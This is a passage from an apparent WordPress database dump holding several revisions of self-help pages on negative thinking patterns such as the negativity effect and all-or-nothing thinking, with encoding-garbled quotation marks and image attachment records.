on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The â€œnegativity effectâ€ type of negative thinking made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-16 08:09:56', '2023-06-16 08:09:56', '', 1616, 'https://www.happythinking.com/?p=1851', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1866, 1, '2023-06-17 08:08:44', '2023-06-17 08:08:44', 'https://www.happythinking.com/wp-content/uploads/cropped-favicon_happythinking170623b.jpg', 'cropped-favicon_happythinking170623b.jpg', '', 'inherit', '', 'closed', '', 'cropped-favicon_happythinking170623b-jpg', '', '', '2023-06-17 08:08:44', '2023-06-17 08:08:44', '', 0, 'https://www.happythinking.com/wp-content/uploads/cropped-favicon_happythinking170623b.jpg', 0, 'attachment', 'image/jpeg', 0),
(1857, 1, '2023-06-17 07:38:00', '2023-06-17 07:38:00', '', 'tigerouch_170623', '', 'inherit', '', 'closed', '', 'tigerouch_170623', '', '', '2023-06-17 07:38:00', '2023-06-17 07:38:00', '', 1616, 'https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1858, 1, '2023-06-17 07:39:59', '2023-06-17 07:39:59', '', 'tiger_memory_170623', '', 'inherit', '', 'closed', '', 'tiger_memory_170623', '', '', '2023-06-17 07:39:59', '2023-06-17 07:39:59', '', 1616, 'https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1859, 1, '2023-06-17 07:41:15', '2023-06-17 07:41:15', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of negative thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of negative thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where one excessively focuses on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of your ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If your ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, your ancestor would have kept remembering the importance of not daydreaming while walking in the forest!Â While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such negative thinking. Once we have gone over the common types of negative thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-17 07:41:15', '2023-06-17 07:41:15', '', 1616, 'https://www.happythinking.com/?p=1859', 0, 'revision', '', 0),
(1876, 1, '2023-06-17 11:27:36', '2023-06-17 11:27:36', '<!-- wp:paragraph -->\n<p>The negative thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between. Unfortunately, one may develop a thinking pattern that involves one thinking often in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this negative thinking pattern, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme. Psychologists also call this kind of negative thinking, â€œblack and whiteâ€ thinking, implying that one doing all-or-nothing thinking does not think in a more balanced â€œgreyâ€ way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1874,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/all_cups_170623a.jpg" alt="" class="wp-image-1874"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your mind does all-or-nothing thinking. Your mind will think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Lucy to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s mind does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments. In the tools section of this website, we will talk about how to see things in a more balanced way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-06-17 11:27:36', '2023-06-17 11:27:36', '', 1627, 'https://www.happythinking.com/?p=1876', 0, 'revision', '', 0),
(1875, 1, '2023-06-17 11:26:31', '2023-06-17 11:26:31', '<!-- wp:paragraph -->\n<p>The negative thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between. Unfortunately, one may develop a thinking pattern that involves one thinking often in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this negative thinking pattern, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme. Psychologists also call this kind of negative thinking, â€œblack and whiteâ€ thinking, implying that one doing all-or-nothing thinking does not think in a more balanced â€œgreyâ€ way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1874,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/all_cups_170623a.jpg" alt="" class="wp-image-1874"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your mind does all-or-nothing thinking. Your mind will think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Lucy to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s mind does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments. In the tools section of this website, we will talk about how to see things in a more balanced way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-06-17 11:26:31', '2023-06-17 11:26:31', '', 1627, 'https://www.happythinking.com/?p=1875', 0, 'revision', '', 0),
(1877, 1, '2023-06-17 11:34:46', '2023-06-17 11:34:46', '', 'all_cups_170623b', '', 'inherit', '', 'closed', '', 'all_cups_170623b', '', '', '2023-06-17 11:34:46', '2023-06-17 11:34:46', '', 1627, 'https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg', 0, 'attachment', 'image/jpeg', 0),
(1878, 1, '2023-06-17 11:34:54', '2023-06-17 11:34:54', '<!-- wp:paragraph -->\n<p>The negative thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between. Unfortunately, one may develop a thinking pattern that involves one thinking often in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this negative thinking pattern, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme. Psychologists also call this kind of negative thinking, â€œblack and whiteâ€ thinking, implying that one doing all-or-nothing thinking does not think in a more balanced â€œgreyâ€ way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1877,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg" alt="" class="wp-image-1877"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your mind does all-or-nothing thinking. Your mind will think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Lucy to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s mind does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments. In the tools section of this website, we will talk about how to see things in a more balanced way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-06-17 11:34:54', '2023-06-17 11:34:54', '', 1627, 'https://www.happythinking.com/?p=1878', 0, 'revision', '', 0),
(1940, 1, '2023-06-21 15:54:32', '2023-06-21 15:54:32', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- 